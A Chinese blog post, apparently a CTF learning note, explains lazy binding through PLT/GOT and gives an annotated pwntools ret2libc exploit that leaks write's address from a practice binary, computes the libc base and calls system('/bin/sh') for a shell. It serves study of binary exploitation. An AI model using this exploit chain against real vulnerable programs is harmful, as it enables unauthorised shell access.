关于延迟绑定的 学习

最新推荐文章于 2024-05-17 02:55:48 发布
最新推荐文章于 2024-05-17 02:55:48 发布
阅读量466 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/85623805
版权

这篇文章是看了  https://segmentfault.com/a/1190000005888964 文章有感而写

若哪里有错  还请各位指教

其实这篇文章我看着很起劲   但是 感觉有几个疑惑点  但是翻阅资料后 也感觉收获了不少 然后我就来分享一下  

我就从延迟绑定开始说起 

延迟绑定 算是一种系统策略吧  有很多库 库中有很多函数  不用的函数 就先不导入程序中  但是如果函数 经过用的话 那么 链接库就会导出这个函数地址给程序  程序就算是得到了 这个函数      然后配合这基址随机化  库的基址不一定 函数的地址也就不一定  

那么我们想用某一个函数的话  那该怎么办   

我们可以 先把函数调用 然后 得出真正的地址 然后 得出 基地址   然后就可以找到我们想要的地址了 

我直接在代码上写注释把 

from pwn import *

p = process('./level3') elf = ELF('./level3') libc = ELF("/lib/i386-linux-gnu/libc.so.6")

cnt = 140 vul_func = 0x0804844b

p.recv() payload1 = 'a'*cnt + p32(elf.symbols['write']) + p32(vul_func) payload1 += p32(1) + p32(elf.got['write']) + p32(4)
# 这句话的意思是 write(1, got_write, 3);  return vul_func;

p.sendline(payload1) write_addr = u32(p.recv(4)) print "write_addr: "+hex(write_addr)
#u32是将字符串解压成数字  和p32 相反  这里p.recv 是接受 上面的 got_write 
libc_base = write_addr - libc.symbols['write'] log.success("libc_base:"+hex(libc_base))
#得出了 基地址  
system_addr = libc_base + libc.symbols['system'] print "system_addr: " + hex(system_addr)
#然后求出 system 的地址  
bin_addr = libc_base + libc.search('/bin/sh').next()
#寻求字符串
print "bin_addr: "+hex(bin_addr) payload2 = 'a'*cnt + p32(system_addr) + p32(vul_func) + p32(bin_addr) p.sendline(payload2)#加载基地址
#构造  
p.interactive()

 

 

pipixia233333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP延迟静态绑定示例分享
10-25
在PHP5.3中,给类加入了关键词static,用于实现延迟静态绑定(late static binding),那么我们来看看一个示例来好好学习
PHP延迟静态绑定使用方法实例解析
10-14
主要介绍了PHP延迟静态绑定使用方法实例解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习,需要的朋友可以参考下
延迟绑定机制深入学习
m0_57754423的博客
03-04 724
昨天晚上深入了解了一下延迟绑定机制,具体的ret2dlresolve还在学习中,进行一点小小的总结的,这里参考了《程序员的自我修养一书》以及CTFwiki。如果有不对的地方,欢迎指正。 延迟绑定机制: 这种机制存在的目的,其实也就是glibc为了节约系统资源,提高性能。 在说攻击手法之前,首先要知道延迟绑定机制的详细过程,即源程序在第一次调用一个函数的时候,首先去该函数的plt[0]表项,然后到该函数got表里,然后跳转到该函数plt[1]表项里,进行压栈操作,这里压的是第一个参数rel_offest
php中延迟绑定,PHP静态延迟绑定
weixin_35213963的博客
03-11 250
静态延迟绑定的概念PHP版本5.3起增加了静态延迟绑定,也称迟绑定,主要用于在继承范围内引用静态调用的类。简单地来说:static::不再被解析为当前方法所定义的类,而是在实际运行时计算的。// 意外的继承class Person{public static $name = 'Person';public static function say(){return self::$name;}}cla...
PLT、POT、延迟绑定
HWP
03-17 587
学习地址:(是一位同学讲的,虽然青涩。但是,还能听明白!)【pwn】CTF学习:4、PLT表与GOT表 | 延迟绑定机制_哔哩哔哩_bilibili GOTGOT表项中的数据才是函数最终的地址,而PLTPLT表中的数据又是GOTGOT表项的地址,就可以通过PLTPLT表跳转到GOTGOT表来得到函数真正的地址。 PLT: PLTPLT表可以称为内部函数表。 POT: GOTGOT表为全局函数表。 延迟绑定: 如下图,注意下图是第一次调用。 第二次就顺畅啦:(已经完成换啦,.
PWN学习day2——plt、got表+动态延迟绑定
qq_44657899的博客
06-27 454
执行过程:call库函数首先会跳转到plt条目的第一条指令处将got表中偏移压入栈中,并跳转到解析地址的代码片段解析完成后跳转去执行库函数并把实际地址写入got表。
Python中的延迟绑定
python学习者的博客
12-09 345
延迟绑定出现在闭包问题中。下面我们看一个闭包的例子: def gen_mul(n): def mul(x): return n*x return mul double = gen_mul(2) double_value = double(6) print(double_value) 可以看出满足闭包的几点: 有内部函数 内部函数引用了外部函数中的自由变量 内部函数被返回 闭包的优点: 可以避免使用全局变量 可以持久化变量,达到静态变量的作用 闭包的缺点: 可
链接器--动态链接--延迟绑定技术学习笔记一
weixin_46430043的博客
01-04 379
欢迎关注我的微信公众号,一起学习,共同进步。链接器--动态链接器--延迟绑定与动态链接器是什么?延迟绑定技术基本知识。
Python函数——闭包延迟绑定_闭包 6 6 6 6
最新发布
2401_84138785的博客
05-17 651
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
pwntools使用第五弹——ret2dlresolve以及延迟绑定
小小鱼的博客
02-11 3522
简介 关于ret2dlresolve利用的原理,可以参考如下博文: https://www.freebuf.com/articles/system/170661.html ret2dlsolve的核心原理就是利用了延迟绑定技术,linux在加载ELF可执行文件的时候,包含的动态链接文件里的符号,并不会直接把这些符号的实际地址加载到内存中,而是会使用PLT + GOT 表来实现延迟绑定,简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来,下次使用的时候就可以直接访问了,关于延
链接器--动态链接器--延迟绑定与动态链接器是什么?学习笔记三
weixin_46430043的博客
01-05 332
前面的几次笔记记录了静态链接技术、加载时链接的动态链接技术,执行时链接的延迟绑定技术,这次笔记主要研究动态链接器的加载流程。链接器--动态链接器--延迟绑定与动态链接器是什么?
具有延迟绑定的文本框
04-11
提供的文件"Text-Box-with-Delayed-Binding.pdf"可能是关于这个主题的详细教程或文章,而"DelayedBindingTextBox.zip"可能包含了一个示例项目,演示如何在实际代码中实现延迟绑定的文本框。通过学习这些材料,开发者...
PHP延迟静态绑定的深入讲解
10-18
主要给大家介绍了关于PHP延迟静态绑定的相关资料,这是最近工作中遇到的一个功能,通过查找相关的资料整理了这篇文章,分享出来供大家参考学习,需要的朋友们下面随着小编来一起学习学习吧。
Vue学习笔记之表单输入控件绑定
12-11
- `.lazy`修饰符:延迟更新,使绑定在`change`事件而非`input`事件时触发,例如:`v-model.lazy="msg"`。 - `.number`修饰符:自动将输入转换为Number类型,如:`v-model.number="num1"`。 7. **其他** - `....
warmup
热门推荐
qq_41071646的博客
01-10 1万+
这个  其实 算是 入门题  在上面可以看到 打印出来了很多东西   然后  发现他会 把我们这个地址打印出来 那么我们只要把返回地址 补充上就好了   这里耗费了 我不少功夫 然后我们输入 动态调试一下  看看哪里  是返回  发现 插了 8*9  72个字符 那么 就很好办了 构造就完事了 # -*- coding:utf-8 -*- from pwn impo...
攻防世界: cgpwn2
qq_41071646的博客
01-02 4272
这个题 也是新手入手的题 比较简单   怎么说呢 就是一个简单的构造罢了 点进hello  然后发现  然后我们点进name   发现 name 地址是固定的 我们可以将这个写入 bin/sh 就可以了 然后看 system列表    这里可以看的出来  是有42个 字符  就可以 返回我们gets 的返回地址  然后  我们 只需要 讲system 搞进去 然后输入...
pwn CTF 4th-QCTF-2018 stack2
qq_41071646的博客
01-23 3410
先把程序跑一遍看看·~~~~~~~ 然后我们好像可以 加数还有 改变数   4功能好像还是 求平均数的 ~~~~ 看来功能还是很齐全的吗~~~~  然后我们 咦 这里的平均数为啥是  2.00呢 ~!~~~~  带着疑问去 看ida 这里好像没有什么毛病  限制了 输入的数量是99 然后往下看   这里就是bug了    因为我们没有检查v13数组的边界 这里我们可...
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 2891
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
动态链接深入解析:延迟绑定与动态链接器揭秘
"08动态链接(下):延迟绑定与动态链接器是什么?1 - 讲解了动态链接过程中的延迟绑定技术以及动态链接器的基本原理,涉及到Java虚拟机的patchcode技术,热更新概念,以及其在软件开发中的应用。" 在动态链接的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值